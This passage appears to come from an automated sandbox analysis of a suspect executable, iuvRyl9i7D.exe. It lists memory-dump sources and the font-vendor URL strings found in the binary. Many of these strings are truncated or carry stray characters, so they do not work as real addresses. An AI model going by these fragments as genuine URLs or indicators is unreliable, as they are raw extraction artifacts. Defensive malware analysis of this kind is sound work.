          Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comdo
          Source: iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258625946.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.come.comK
          Source: iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258625946.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256684499.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrito
          Source: iuvRyl9i7D.exe, 00000000.00000003.251899663.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comlic
          Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252077012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251960719.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252004043.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251866854.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.commnF0$
          Source: iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
          Source: iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252354121.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252193043.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252384451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comsivao
          Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comtoedK
          Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251866854.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251839011.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251710288.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251678493.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comueo
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn.
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn5
          Source: iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: iuvRyl9i7D.exe, 00000000.00000003.253906964.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253976291.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253867962.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254019876.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254002805.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253846416.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254048216.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: iuvRyl9i7D.exe, 00000000.00000003.253906964.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253976291.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253867962.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254019876.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254002805.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253846416.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254048216.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.html
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249550634.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/(
          Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/2
          Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/:
          Source: iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/U
          Source: iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/X:
          Source: iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0(
          Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ana
          Source: iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/r
          Source: iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/n
          Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/o
          Source: iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/r
